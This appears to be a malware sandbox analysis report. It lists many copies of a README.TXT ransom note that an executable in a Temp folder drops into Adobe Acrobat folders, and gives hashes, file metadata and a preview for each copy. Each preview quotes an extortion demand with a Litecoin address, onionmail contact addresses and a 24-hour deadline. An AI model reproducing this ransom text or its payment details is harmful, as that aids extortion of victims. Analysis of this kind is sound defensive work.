                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\sl-sl\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\sv-se\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\tr-tr\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\uk-ua\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-cn\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-tw\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\da-dk\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\de-de\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\en-gb\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\es-es\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\fi-fi\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\fr-fr\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\it-it\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\ja-jp\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
